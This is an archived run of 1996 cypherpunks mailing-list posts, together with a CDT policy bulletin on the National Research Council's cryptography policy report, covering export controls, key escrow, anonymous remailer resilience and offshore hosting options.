  reasonable manner on an unclassified basis."  The study goes on to
  note, "Although many of the details relevant to policy makers are
  necessarily classified, these details are not central to making policy
  arguments one way or another. Classified material, while important to
  operational matters in specific cases, is neither essential to the big
  picture or why policy has the shape and texture that it does today nor
  required for the general outline of how technology will, and why
  policy should, evolve in the future."

  This is a startling revelation which will profoundly alter the
  encryption policy debate.  No longer can the government claim, "If you
  knew what we knew, you would understand this issue." It also suggests
  that, while national security and law enforcement interests are an
  important element in the debate, there is no "secret-silver-bullet"
  which trumps all other considerations.

  From now on, the debate over cryptography policy should occur in the
  open, with all issues aired publicly.  By removing its arguments from
  the veil of secrecy, the government can go a long way towards building
  the trust of the public.

* EXPORT CONTROLS DO INFLUENCE THE DOMESTIC MARKET AND HARM
  COMPETITIVENESS OF US INDUSTRY: The NRC study confirms what civil
  liberties advocates and the computer industry have long argued: that
  the current administration policy of limiting the export of strong
  encryption is impacting the domestic market and harming US business.

  The study states, "Export controls also have had the effect of
  reducing the domestic availability of products with strong encryption
  capabilities... Thus, domestic users face a more limited range of
  options for strong encryption than they would in the absence of
  export controls."

* MARKET FORCES, NOT GOVERNMENT INTERESTS, SHOULD DRIVE THE POLICY
  DEBATE: The study stresses that the domestic availability of
  encryption should not be restricted in any way, and that the market of
  individual users, rather than the government's interests, should drive
  the development of technology and policy.

  The study notes, "As cryptography has assumed a greater importance to
  non government interests, national cryptography policy has become
  increasingly disconnected from market reality and the needs of parties
  in the private sector ... A national cryptography policy that is
  aligned with market forces would emphasize the freedom of domestic
  users to determine cryptographic functionality, protections, and
  implementations according to their security needs as they see fit."

The study is without a doubt the most comprehensive and balanced analysis
of the complex encryption policy debate yet published. While stressing
the need for strong encryption to protect individual privacy and to
maintain the competitiveness of US industry in the global marketplace,
the report also acknowledges the real challenges posed to law
enforcement and national security by the global proliferation of strong
encryption technologies. The authors of the study deserve great credit for
their work in producing what will clearly become the basis for an open and
honest public debate over the need to reform US encryption policy.

Information on how to obtain a copy of the document is available at
<http://www2.nas.edu/cstbweb/>

OVERVIEW OF THE NRC REPORT'S POLICY RECOMMENDATIONS

The report also outlines several recommendations for a national
cryptography policy.  An overview of these recommendations is attached
below. CDT will post an analysis of the NRC's policy recommendations in the
near future.

Recommendations of the Committee for national cryptography policy would:

1. Free domestic manufacture, sale, and use of encryption -- The
   committee argued that any future legal prohibitions on the domestic
   use of any kind of cryptography are "inappropriate." While no such
   prohibitions are currently in effect, many encryption users have been
   concerned over law enforcement's articulated desire to slow the
   domestic use of encryption.

2. Call for open policy-making process -- The report supports the
   development of national cryptography policy based on open public
   discussion. Policy to date has often taken place outside of the
   public eye, and with little guidance from Congress or the general
   public.

3. Align national policy with market and user demand -- The report notes
   that national policy has "become increasingly disconnected from
   market reality and the needs of parties in the private sector."

4. Progressively relax, but not eliminate, export controls -- The
   committee recommends that export controls should be "progressively
   relaxed but not eliminated." This would include:

4.1.  Products that meet "most general commercial requirements" for
      confidentiality should be exportable -- The report suggested that
      56-bit DES products would meet this need and should be exportable
      today, and that this level of security should be increased over
      time. The report noted that DES provides a significantly more
      attractive level of security than 40-bit products currently
      exportable, without imposing too great a burden on national
      security as many sophisticated targets do not use U.S. products
      today.

4.2.  Stronger products should be exportable to a list of approved
      companies if access to decrypted information is provided -- The
      report argues that exports of encryption greater than 56-bit DES
      should be permitted for "trustworthy" users who will guarantee
      access to decrypted information upon a legally authorized request.
      The report does, however, acknowledge the significant privacy and
      security concerns raised by any such "key escrow" plan.

4.3.  The U.S. government should streamline the export licensing process.

5.  Provide assistance for law enforcement -- The report recognizes that
    "cryptography is a two-edged sword" for law enforcement, providing
    both a tool to help prevent crime such as economic espionage, fraud,
    or destruction of the information infrastructure, and a potential
    impediment to law enforcement investigations and signals
    intelligence. Specific suggestions to assist in adjustment to "new
    technical realities of the information age" include:

5.1.  The government should encourage use of encryption for
      authentication and integrity.

5.2.  The government should promote telecommunications security,
      especially for cellular phones and telephone switches.

5.3.  The government should explore escrowed encryption for its own
      uses. The report recommends further use of escrowed encryption for
      government purposes as a testbed for the technical and privacy
      concerns raised by key escrow policies. The report acknowledged
      many of the problems of escrow, and noted that escrow may never be
      adopted freely by the market for real-time communications but that
      such communications will be of less concern to law enforcement
      over time.

5.4.  The government should seriously consider criminalizing "the use of
      encrypted communications in interstate commerce with the intent to
      commit a federal crime." The report acknowledged the risks posed
      by such legislation, including ambiguity about what is an
      encrypted communication, how to deal with automatic or ubiquitous
      encryption, and how to define intent and the need for an
      underlying criminal conviction.

5.5.  Research and development of additional capabilities for law
      enforcement should be given a high priority.

6.  The government should develop a mechanism to promote information
    security in the private sector.

CDT will post an analysis of the report's recommendations soon.  In the
meantime, detailed background information on the encryption policy debate,
including the text of several bills pending before the Congress to
liberalize the export of encryption technology, is available at CDT's
encryption policy web page: http://www.cdt.org/crypto/.

------------------------------------------------------------------------
(2) JOIN CONGRESSMAN RICK WHITE (R-WA) LIVE ONLINE TO TALK ABOUT THE
    INTERNET CAUCUS, THE CDA, AND TAKE YOUR QUESTIONS

Congressman Rick White (R-WA) will be live online at HotWired on Wednesday
June 5 at 9:00 pm ET to discuss his efforts to encourage better
communication between members of Congress and the Internet community, his
plans for the Congressional Internet Caucus, and other topics.
Representative White will also answer questions from Netizens.

DETAILS ON THE EVENT

* Wednesday June 5, 9 - 10 pm ET (6 pm Pacific) on HotWired

   URL: http://www.hotwired.com/wiredside/

To participate, you must be a registered HotWired member (there
is no charge for registration).  You must also have RealAudio(tm) and
a telnet application properly configured to work with your browser.

Please visit http://www.hotwired.com/wiredside/ for information on how
you can easily register for Hotwired and obtain RealAudio.

Wednesday's forum is another in a series of planned events, and is part
of a broader project coordinated by CDT and the Voters Telecommunications
Watch (VTW) designed to bring the Internet Community into the debate and
encourage members of Congress to work with the Net.community on vital
Internet policy issues.

Transcripts from last week's discussion with Senator Leahy are available at
http://www.cdt.org/crypto/.  Events with other members of Congress working
on Internet Policy Issues are currently being planned. Please check
http://www.cdt.org/ for announcements of future events

------------------------------------------------------------------------
(3) SUBSCRIPTION INFORMATION

Be sure you are up to date on the latest public policy issues affecting
civil liberties online and how they will affect you! Subscribe to the CDT
Policy Post news distribution list.  CDT Policy Posts, the regular news
publication of the Center For Democracy and Technology, are received by
more than 9,000 Internet users, industry leaders, policy makers and
activists, and have become the leading source for information about
critical free speech and privacy issues affecting the Internet and other
interactive communications media.

To subscribe to CDT's Policy Post list, send mail to

     policy-posts-request@cdt.org

with a subject:

     subscribe policy-posts

If you ever wish to remove yourself from the list, send mail to the
above address with a subject of:

     unsubscribe policy-posts

-----------------------------------------------------------------------
(4) ABOUT THE CENTER FOR DEMOCRACY AND TECHNOLOGY/CONTACTING US

The Center for Democracy and Technology is a non-profit public interest
organization based in Washington, DC. The Center's mission is to develop
and advocate public policies that advance democratic values and
constitutional civil liberties in new computer and communications
technologies.

Contacting us:

General information:  info@cdt.org
World Wide Web:       URL:http://www.cdt.org/
FTP                   URL:ftp://ftp.cdt.org/pub/cdt/

Snail Mail:  The Center for Democracy and Technology
             1634 Eye Street NW * Suite 1100 * Washington, DC 20006
             (v) +1.202.637.9800 * (f) +1.202.637.0968

-----------------------------------------------------------------------
End Policy Post 2.22                                           5/30/96
-----------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: clouds@alpha.c2.org (The Dreamer)
Date: Fri, 31 May 1996 20:14:29 +0800
To: cypherpunks@toad.com
Subject: someone to "educate"
Message-ID: <199605310231.TAA25953@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


This was, well, interesting.  As a result of the recent loss
of many remailers, I started looking for a local (to me)
ISP that would offer me an anonymous account, and/or a shell
account.  Nobody would offer me a shell account except for
these people, and here's what they had to say about
an anonymous account...

Received: by alpha.c2.org for clouds@alpha.c2.org
 From gjung@igateway.net  Thu May 30 06:33:10 1996

The policy is set and I am not going to argue with you about it.  I 
explained that we do not feel that anyone needs to be doing things that
they do not want their name attached to on the Internet, and for that
reason do not offer anonymous accounts.  You have offered no reason to
change the policy.  I regret that we are unable to offer service to you.

----------
From: 	The Dreamer[SMTP:clouds@alpha.c2.org]
Sent: 	Wednesday, May 29, 1996 5:32 PM
To: 	gjung@igateway.net
Subject: 	anonymity/corporate policy

> Corporate policy dictates that we do not offer anonymous
> accounts. It is corporate belief that there should be no
> reason anyone needs anonymity on the net

That's an, er, interesting policy.  Although there are
a great number of arguments for anonymity - and privacy -
I won't try to persuade an obviously uninterested audience.
(That's you.)  I'd like to see the relevant corporate
policies; are they available at www.igateway.net or elsewhere?
Also, is there a more precise rationale behind the decision?

I'd very much like to do business with you, but if you
don't want my money, that's cool.

d.









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Cyber9090@aol.com
Date: Fri, 31 May 1996 16:23:01 +0800
To: cypherpunks@toad.com
Subject: unsubscibe
Message-ID: <960530201539_124302386@emout16.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


unsubscibe cyberpunks cyber9090@aol.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Cyber9090@aol.com
Date: Fri, 31 May 1996 16:19:13 +0800
To: cypherpunks@toad.com
Subject: unsubscibe
Message-ID: <960530201605_124302710@emout10.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


unsubscibe cypherpunks cyber9090@aol.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Fri, 31 May 1996 16:58:24 +0800
To: stewarts@ix.netcom.com
Subject: Re: An alternative to remailer shutdowns
Message-ID: <01I5BYGFWN5S8Y52RR@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"stewarts@ix.netcom.com"  "Bill Stewart" 29-MAY-1996 19:17:02.67

>On the other hand, if the Church of Spam tries to frame remailers
>by posting their own Secret Documents, they can only target the
>terminal remailers and as far back as they can subpoena,
>because they'd otherwise have to admit that they posted it.

	Unfortunately, you may very well be incorrect on this. I had a chat
with Uni over email a couple of days ago, and he reminded me of the possibility
of them doing this through an account that wasn't obviously theirs, then
claiming the initial remailer operator was negligent in not filtering the mail.
The way to counter this is to only accept mail that's already encrypted to
another remailer (i.e., Mixmaster with outgoing mail from non-remailers only
to other remailers). If the judge is going to find a remailer operator
responsible for the content of material he/she can't even read, then the
remailer network is dead in its present form anyway.
	There's also the analogous consideration for outgoing remailers; they
may need to send only encrypted mail to the transient end point(s), and the
end points may need to be anonymous both in input and output. If the last
remailer can read the material, then the Co$ or whoever can argue that they
should filter it. The end point has to be able to read it for public messages
(I'm not counting encrypted posts meant for one or a few people as public
messages) to go out, so the end point would be vulnerable to lawsuits, etcetera
if its identity were known.
	We've thus got to have the initial user choosing the ephemeral end
point, and sending it to that end point encrypted for that end point. Since
a well-known end point (e.g., everybody knows where to send mail to) is likely
to get shut down quickly (much more so for its input end than would otherwise
be the case, if the input and output ends are separate), I would suggest having
the ephemeral end point owners send an appropriately encrypted message to the
remailer operators, or (preferably) to a subset of them (thus being able to
spot any corrupted remailer who consistently blows the gaff). This message
would contain the public key for an end point or set of end points, a random
number associated with that public key (although a KeyID or fingerprint might
do instead), plus input end addresses for each of the end points run using that
public key; this would all be signed with the public key in question. (Having
it on the keyservers so as to build up reputation through signatures would be
good in addition, with some appropriate pseudonymous UserID to link it with).
Remailer users would then get the random number plus its associated public
key upon mailing a remailer with an appropriate help request. If a remailer
received for output a number it didn't recognize, I would suggest remailing
the information - encrypted appropriately - to another remailer. One additional
advantage of this system would be that the end users wouldn't need to know
about changes in input end points - their mail would simply go to whichever
of the available input end points corresponding to that public key & random
number that that remailer knew and happened to randomly select.

>There's been some discussion of delivering outgoing mail by
>sending it through systems that don't add Received: headers;
>it may make sense for non-root-owned remailers to do this
>using telnet to port 25 instead of their local sendmail,
>to prevent local logging and prevent their sendmail from
>adding its own information.  Some sendmails try to detect forgery,
>but systems that aren't even configured to do Receive: probably don't.

	I had wondered about Port 25 as one possibility for this. Incidentally,
I forgot to save the posting from someone who had commented about AOL sending
out lots of membership kits with free net time - useful for ephemeral end
points, although the anonymnity would be a problem. It might be interesting to
find out what mailing lists they're getting their lists from - magazines
catering to the middle+ classes is my guess.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Fri, 31 May 1996 17:39:40 +0800
To: cypherpunks@toad.com
Subject: Edited ACLU News
Message-ID: <01I5BZJM1TGG8Y52RR@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"rre@weber.ucsd.edu" 30-MAY-1996 01:11:39.86
From: Phil Agre <pagre@weber.ucsd.edu>

>=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
>This message was forwarded through the Red Rock Eater News Service (RRE).
>Send any replies to the original author, listed in the From: field below.
>You are welcome to send the message along to others but please do not use
>the "redirect" command.  For information on RRE, including instructions
>for (un)subscribing, send an empty message to  rre-help@weber.ucsd.edu
>=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

>Date: Wed, 29 May 1996 11:57:30 GMT
>From: ACLU Newsfeed Owner <owner-aclu-news@aclu.org>
>To: news@aclu.org

[...]

>                     *Ban on "Offensive" Comments Ruled Vague*

>SAN FRANCISCO -- A state law against "offensive" personal comments by lawyers
>was ruled unconstitutionally vague Friday for the second time, despite the
>State Bar's attempt to define it, the Associated Press reports.

>The 9th U.S. Circuit Court of Appeals first struck the law down in April
>1995, overturning a disciplinary order against a Los Angeles attorney who
>denounced women lawyers, the AP reported. In a 3-0 ruling, the court said the
>law was so broad and undefined that lawyers wouldn't know when they were
>violating it.

>The panel granted a rehearing last December to give the state and the State
>Bar, not previously parties, a chance to defend the law.

>The bar cited its new policy, adopted in October, that said the law would be
>enforced only against conduct in a courtroom or similar setting, such as a
>sworn deposition, that was so serious as to be "prejudicial to the
>administration of justice." They also said the law merely enforced an ethical
>code that lawyers were required to know as part of their profession.

>The court was unpersuaded, AP said, reaffirming its previous decision in a
>2-1 ruling.

>The case involved a disciplinary order against attorney Frank L. Swan, who
>wrote an angry note in May 1993 to a female prosecutor who had gotten him
>removed from a case. He attached the following statement to the note,
>photocopied from a magazine article:

>"Male lawyers play by the rules, discover truth and restore order. Female
>lawyers are outside the law, cloud truth and destroy order."

>In overturning the disciplinary order, the appeals court said the note showed
>a "patently sexist attitude'' but did not impugn the female prosecutor's
>integrity or interfere with the administration of justice.

>The American Civil Liberties Union defended Swan. The National Organization
>for Women was among those opposing him.

	One notices that the court did not strike this down on the obvious
grounds of free speech. I believe this may be an example of a law, not
struck down on such grounds, that fits TCMay's description that Rich
disputed.

>----------------------------------------------------------------
>                                 *Clinton Expands National ID*

>Seeking to further demonstrate its tough stance against illegal immigration,
>the Clinton Administration announced Thursday a national expansion of a pilot
>program in California that requires participating employers to verify the
>legal status of job seekers, according to a front page article in the New
>York Times.

>Specifically, the Immigration and Naturalization Service reached agreement
>with the nation's four largest meat-packing companies (representing 80
>percent of the industry's 70,000 employees) to use a computerized data system
>at 41 plants in 12 Western and Midwestern states to determine if job
>applicants are documented workers.

>The ACLU and other civil libertarians have long criticized the plan, saying
>it would lead to an costly, intrusive and error-prone national identification
>card.

>The effort announced today builds on the seven-month-old pilot program in two
>Southern California counties, Santa Ana and the City of Industry.  

>Meanwhile, immigration bills approved by the House and the Senate, and now
>awaiting resolution in a conference committee, include differing provisions
>that would expand pilot programs even further to allow the INS to more
>quickly evaluate among different systems.  

>"These pilot programs all lead down the same path," said Greg T. Nojeim, an
>ACLU Legislative Counsel.  "Unless the public steps up its pressure to stop
>them from proceeding, the government will build a giant computer registry
>that will require every single hiring decision in this country to be cleared
>through a centralized database."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Fri, 31 May 1996 18:42:15 +0800
To: cypherpunks@toad.com
Subject: Something that just crossed my mind. Sorry.
Message-ID: <Pine.LNX.3.93.960530220921.1660D-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain



	In some of the discussion on this list there has been some concern
about the governments position on anonymous fund transfers. Well, maybe
concern is incorrect. We _know_ (or should) what it is. They are dead set
against it. 
	My thought was that business would be against it as well, which
would make it even harder to implement. Now maybe this has been dicussed
in the years before I got here, so if it has, sorry. 

	The discussion here seems to assume that business will accept, or
even welcome the ability of it's customers to remain unknown, or nymknown.
It is my position (until proven wrong--please) that larger business DON'T
want anonymity. They _want_ to be able to track purchases and use of their
product for several reasons. 

	These are still pretty rough, but:
	1) Marketing. Here in chicago, there is a grocery store that
issues a discount/check cashing card. Because this card is a Check Cashing
card you need to give financial data to get it. This data includes
address, bank account info etc. This card is presented at purchase time,
and is of course personalized and your purchases are (assumptions from
here to end) tracked, and can be used to develop targeted marketing (with
the development of print on demand systems, this becomes even easier). 
	The use of anonymity (at this point you don't _need_ to get the
card, unless you want to use a check, so cash (how I pay, my wife is
different) is still viable) would ruin this. 
	Why would they want to change?

	2) For larger purchases, this data gathering is even more
important. I am sure that GM, Ford, Toyota et. al. keep and compile
extensive demographic information on their customers for use in product
development and target marketing. 
	
	It is my belief that it is infact big business that drives the
legislation in this country, and if they want anonymous fund transfers,
they will get it. Most people would be more than willing to use anonymous
purchasing, but big business doesn't currently want it, and IMO, they
never will.
	
	Smaller business would welcome it, but many of these businesses
are the very businesses that many fundamentalist/feminist/statist types
would like to eliminate. Porn, Sex trade, and drug trade(which is already
pretty anonymous) all fall into this category. 

	The questions that this raises are:

	1) Am I full of shit. This is very possible. 

	2) What pressure can we put on the government to go against both
their own wishes and the wishes of Big Business (answer: none, or very
little)
	3) Given 2, what can be done to change the minds of Big Business?

	Not to say that the protocalls and software shouldn't be developed
and deployed. It should, to prove that it works, and to allow those
willing to use it to do so. If it proves popular and economically viable,
it could do 3, and then 2 would not be necessary. 

	Then again, given 1...


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 31 May 1996 19:24:48 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Possible out-of-US remailer sites, 2nd edition
Message-ID: <199605310555.WAA01089@dfw-ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>_Country/Area_  _Name_                           _Email_
>Anguilla        Cable & Wireless                 webmaster@candw.com.ai
>Anguilla	Offshore Information Services***  info@offshore.com.ai
....

Cool list - thanks!  Cable & Wireless, by the way, is a major carrier
in a number of places in the world, so it may have to tolerate 
government regulations more than a small or non-telecom business would.
On the other hand, when I've done traceroutes to Vince's machine,
they went through C&W, so if there were really major pressure on C&W,
they might end up having to cut of Vince and other small remailers anyway.

There are a number of small countries that aren't part of the 
US/European/Chinese/Singaporean Hegemonies, where telecom is expensive and
Fidonets and uucp are the way to get email there.  If you're willing to
pay some money to support one, you might get some real anonymity
for financially critical data.  Also, there are periodic articles
in magazines like Wired about how George Soros is wiring the Balkans;
perhaps someone there would like to make some money running remailers.
There was one in Slovenia for a while, though I don't know if it was
physically there or only had a .si domain.
#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215
# goodtimes signature virus innoculation






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 31 May 1996 19:45:01 +0800
To: cypherpunks@toad.com
Subject: Re: NRC Cryptography Report:
Message-ID: <199605310619.XAA02330@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Some dumb questions from a citizen.

Note: Recommendation summaries are from "Fight-Censorship Dispatch #11:
Landmark Crypto Study Released", posted by Declan McCullagh
<declan@eff.org>.  Thanks Declan.

>Recommendation 4:  Export controls on cryptography should be
>progressively relaxed but not eliminated.
>
>        4.1 -- Products providing confidentiality at a level that
>        meets most general commercial requirements should be easily
>        exportable.  Today, products with encryption capabilities that
>        incorporate 56-bit DES provide this level of confidentiality
>        and should be easily exportable.

How do you reconcile this recommendation with the recommendation of the
Cryptography experts group that data which needs to be kept secret for 20
years should be protected by at least 90 bit keys?

The current export restrictions inhibit using strong crypto domestically. 
How do this recomendation free domestic crypto for commercial development? 
Another way of asking is, how can strong crypto be distributed in the US so
as to preclude prosecution for exporting it?  How do future export controls
affect software posted to FTP/web sites?

>
>        5.3 -- To better understand how escrowed encryption might
>        operate, the U.S. government should explore escrowed
>        encryption for its own uses.  To address the critical
>        international dimensions of escrowed communications, the U.S.
>        government should work with other nations on this topic.

How do government experiments with key recovery systems help us learn about
their vulnerablities to human level attacks, e.g. bribery?  How much
negotiable value will these government systems carry?

How will GAKed systems protect US business from spying by foreign
governments?  France is rumored to be particularly active in commercial
spying, and will want access to all keys used in France.


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Fri, 31 May 1996 16:14:46 +0800
To: cypherpunks@toad.com
Subject: The Full NRC Crypto Report
Message-ID: <199605302337.XAA26658@pipe2.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


We got a copy of the full 434-page NRC report today at the D.C. public
meeting, headed noted "May 30, 1996, Prepublication Copy subject to Further
Editorial Correction." 
 
 
We are now scanning it and would be interested to know if anyone else is
doing so we don't duplicate the task. 
 
 
The full report consists of 32 pages of intro, 276 pages of main text in 8
parts, and 126 pages of 14 appendices. 
 
 
We note that the CSTB Web version of the Overview does not include the
Contents of the full report as did the printed Overview available at the
meeting. 
 
 
We will post the Contents here shortly to give a taste. And later give a
Web site for the Thing. 
 
 
BTW, there was a press briefing on the report at 11:00 AM, so stories may
be in the works.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@infonex.com (Lance Cottrell)
Date: Fri, 31 May 1996 20:19:04 +0800
To: cypherpunks@toad.com
Subject: Re: Quickremail v1.0b
Message-ID: <add442b5080210046b1c@[206.170.115.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:36 PM 5/28/96, E. ALLEN SMITH wrote:
>From:   IN%"matts@pi.se"  "Matts Kallioniemi" 28-MAY-1996 06:08:28.40
>
>>Why would anyone set up a remailer at Lance's (or Sameer's) machine?
>>They have remailers running already. If the thugs break root and obtain
>>one remailer key from a machine, they probably get all the keys on that
>>machine, compromising all the remailers in one single attack. Or am I
>>missing something? Is there any benefit of multiple remailers on a machine
>>where root is running his own remailer?
>
>        Well, the advantages are: A. I get Lance's help more quickly in setting
>up this one, so I can later go to other machines (preferably out of the
>country) and set things up the same way there (getting Mixmaster from an
>out-of-US source, of course); and B. supporting the efforts of Sameer, Lance,
>et al by paying them some money. While multiple ISPs are certainly
>preferable (to avoid one rubber-hose (e.g., law enforcement) breaking from
>getting everything), your argument assumes that all the machines at a given
>ISP are linked together such that if one is broken, the rest are - which
>isn't very good from a security standpoint, so I'd hope it _isn't_ the case.
>
>        Thanks,
>        -Allen

In addition, it is more remailers which need to be shut down to bring the
remailer system down. At this point I think we need to think of robustness
against shutdowns in our threat models, in addition to the usual
considerations of traffic analysis. With all the shutdowns, the most
immediate need is for more remailers.

        -Lance

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 31 May 1996 20:28:40 +0800
To: cypherpunks@toad.com
Subject: Re: opinions on book "The Truth Machine"
Message-ID: <add3e6fd010210046a7b@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


It sounds like a "make.money.fast.by.promoting.this.book" scam to me.

At 3:32 AM 5/31/96, A.Back@exeter.ac.uk wrote:
>Anyone read this book?  Available on line:
>
>        http://www.truthmachine.com/
>
>The book is a possible future world scenario exploring the social
>implications of another new potential technology, a 100% reliable
>truth test.  What would society do with such a device?
>
>The book explores the direction in which it is no longer possible to
>speak untruthfully without detection.  A different approach to AP to
>ensuring honesty in politicians.
....

Adam,

I find it hard to believe you're caught up in this "Amway novel" nonsense.
(I saw the ads for it in many newsgroups a few weeks ago.)

A "machine which makes lying impossible"? Give me a break. (Sounds like a
great scheme for factoring large numbers...you just pick a pair of factors
at random and the "truth machine" says whether you're lying or not....Other
problems with this "truth machine" are left as an exercise.)

In any case, I decided to waste a few minutes skimming the opening parts of
this "online media event novel" and discovered at the URL you cited:

"Complete this brief survey and receive the first two and a half chapters
of the book free! Upon submission, you will be given access to these
chapters of The Truth Machine......"

Utter bullshit. If the book was any good it would have a real publisher,
not an opinion survey.


--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Fri, 31 May 1996 18:43:27 +0800
To: remailer-operators@c2.org
Subject: Possible out-of-US remailer sites, 2nd edition
Message-ID: <01I5C4N7IN5C8Y52T1@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	This is the second edition of my listing of possible good companies
outside the US from which to run an anonymous remailer, assuming telnetting
to a UNIX shell in most cases. (Those marked with a + have access through PPP,
SLIP, or similar protocols). I have removed Malaysia from the listing due to
its government's suppression of free speech/press, which Rich Graves was kind
enough to point out to me.
	The countries on here are a mixture of those with strong support for
free speech/press, and those with useful laws regarding offshore companies,
through which a for-profit remailer might be run with limited liability.

_Country/Area_  _Name_                           _Email_
Anguilla        Cable & Wireless                 webmaster@candw.com.ai
Anguilla	Offshore Information Services*** info@offshore.com.ai
Antigua         Cable & Wireless                 scholla@candw.ag
Barbados        CaribSurf                        webmaster@caribsurf.com
Denmark         cybernet.dk                      info@cybernet.dk
Finland         Clinet                           clinet@clinet.fi
Finland         Net People                       helpdesk@netppl.fi
Finland         Xgateway Finland*                pal@xgw.fi
Iceland         Multimedia Consumer Services     mmedia@mmedia.is
Isle of Man     Advanced Systems Consultants**   info@advsys.co.uk
Jamaica         InfoChannel                      icquery@infochan.com
Liechtenstein   Ping Services                    afink@ping.ch
Liechtenstein   Online Store                     webmaster@onlinestore.com
Malta           maltaNET                         info@maltanet.omnes.net
New Zealand	+PlaNet Free NZ			 support@planet.gen.nz 
New Zealand	+PlaNet FreeNZ Wellington	 tich@wn.planet.gen.nz
New Zealand	The Internet Group		 info@ihug.co.nz
New Zealand	+Manawatu Internet Services	 info@manawatu.gen.nz
New Zealand	Wave Internet Services		 accounts@wave.co.nz
Sweden          FX                               fx@uni-x.se
Sweden          Internet One**                   Support@one.se
Sweden          Kajplats 305                     info@kajen.malmo.se

* = This organization has on its main page a link to a document called the
"Declaration of an Independent Internet." It thus may be possible to persuade
them to support a remailer at reduced or no charge as part of this.

** = This organization's main page has the EFF blue ribbon, unlike others.

*** = This organization is run by a cypherpunk, Vince Cate. It does have the
disadvantages of requiring $50 a month or $420 a year for a telnet-only UNIX
shell, with a limit of 50 MB/month for mail without extra charges. However, its
charge is $20 a month or $168 a year for a POP account, although the limit is
then 20 MB/month for mail without extra charges.

        I would appreciate comment on all aspects of this list. These include:
additional companies and countries to add; companies or countries to take off
(international politics & law is not my subject); and suggestions about where
to look for more (it is quite possible that I did not locate all the lists of
out-of-US ISPs).
        -Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Fri, 31 May 1996 17:03:54 +0800
To: cypherpunks@toad.com
Subject: NRC Report Contents
Message-ID: <199605310124.BAA06936@pipe2.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


 
                       [Report Cover] 
 
                     [Header all pages] 
              May 30, 1996, Prepublication Copy 
           Subject to Further Editorial Correction 
 
 
 
               Cryptography's Role in Securing 
                   the Information Society 
 
 
 
            Kenneth Dam and Herbert Lin, Editors 
 
       Committee to Study National Cryptography Policy 
        Computer Science and Telecommunications Board 
Commission on Physical Sciences, Mathematics, and Applications 
 
                  National Research Council 
 
 
                   National Academy Press 
                    Washington, D.C. 1996 
 
____________________________________________________________ 
 
                          Contents 
 
 
PREFACE 
 
   Introduction 
   Charge of the Committee to Study National Cryptography 
   Policy 
   What This Report Is Not 
   On Secrecy and Report Time Line 
   A Note from the Chair 
   Acknowledgments 
 
EXECUTIVE SUMMARY 
 
A ROAD MAP THROUGH THIS REPORT 
 
 
 
             PART I -- FRAMING THE POLICY ISSUES 
 
 
1  GROWING VULNERABILITY IN THE INFORMATION AGE 
 
   1.1  The Technology Context of the Information Age 
 
   1.2  Transitions to an Information Society -- Increasing 
        Interconnections and Interdependence 
 
   1.3  Coping with Information Vulnerability 
